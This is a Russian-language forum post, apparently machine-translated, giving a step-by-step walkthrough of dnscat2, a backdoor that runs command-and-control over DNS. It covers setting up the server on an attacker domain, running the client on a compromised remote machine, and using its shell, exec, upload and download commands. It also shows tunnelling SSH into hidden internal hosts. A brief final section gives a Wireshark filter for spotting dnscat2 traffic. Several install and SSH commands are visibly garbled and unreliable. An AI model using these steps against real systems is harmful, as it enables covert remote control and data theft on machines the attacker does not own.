DNSCAT – Бэкдор через DNS
Этичный Хакер
dnscat2 – программа для создания канала C&C с использованием DNS. Включает серверную часть, написанную на Ruby, и клиентскую часть, написанную на C. Command and Control server-это компьютер, управляемый злоумышленником, который отправляет команды на скомпрометированную машину.
Часто бывает так, что брандмауэр, разрешение имен почти всегда позволяет пропускать обычный трафик. Вы можете увидеть пример схемы ниже:
Введите в терминал:
sudo apt-get crate sudo art-get -y iinstall ruby-dev git make g++ sudo gem install bundler git clone https://github.com/iagox86/dnscat2.git
или.
sudo art-get crSate && sudo art-get -y inStall ruby-dev git make g++ && sudo gem install bundler && git clone https://github.com/iagox86/dnscat2.git.
Установка серверной части:
cd dnscat2/server bundle Hinstatall
Установка клиентской части:
cd dnscat2/client make
Здесь описаны некоторые ошибки. Если у вас нет ошибки, напишите в этой теме или погуглите ее. iagox86/dnscat2
Случай
Сервер: sudo ruby dnscat2.rb.
Клиент: запуск на удаленной машине.
Сервер
Код:
sudo ruby dnscat2.rb legitdnsserver.com
Клиент
Код:
./build legitdnsserver.com
номер сеанса dnscat2
Код:
session -i <номер сеанса>
Код:
clear delay download echo exec help listen ping quit set shell shutdown suspend tunnels unset upload window windows
Поиск туннеля
Если вам нужен удобный SSH-доступ к машинам в вашей локальной сети, это очень полезная вещь.
Выбираем сеанс и вводим команду:
listen <port> <dest ip>:<ssh port>
Теперь вы можете легко подключиться к машине, которая не видна снаружи, через ssh.
ssh -P <порт> username@127.0.0.1.
Кстати, dnscat2 по умолчанию поддерживает шифрование. Автор говорит, что это не гарантирует 100% криптографической стабильности, но защита есть.
Как обнаружить dnscat2 на компьютере.
Свалка через wireshark и забить следующий фильтр:
dns.qry.name.len > 16 and !mdns
16 – только длина доменного имени DNS. Я взял трубку вручную, у вас может быть другой номер. Чтобы найти его, просто посмотрите на результат фильтра.
После этого фильтра могут остаться обычные DNS-запросы, просто найдите dnscat.
А в информации о пакете мы ищем dnscat.
Служебные ссылки
https://github.com/iagox86/dnscat2 – Страница dnscat, с ее документацией.
https://www.sans.org/reading-room/whitepapers/dns/detecting-dns-tunneling-34152 – Об обнаружении туннелей DNS.
P. S, возможно, вышел за рамки раздела “Программное обеспечение” в некоторых моментах, но было необходимо показать функциональность. Спасибо вам всем за внимание.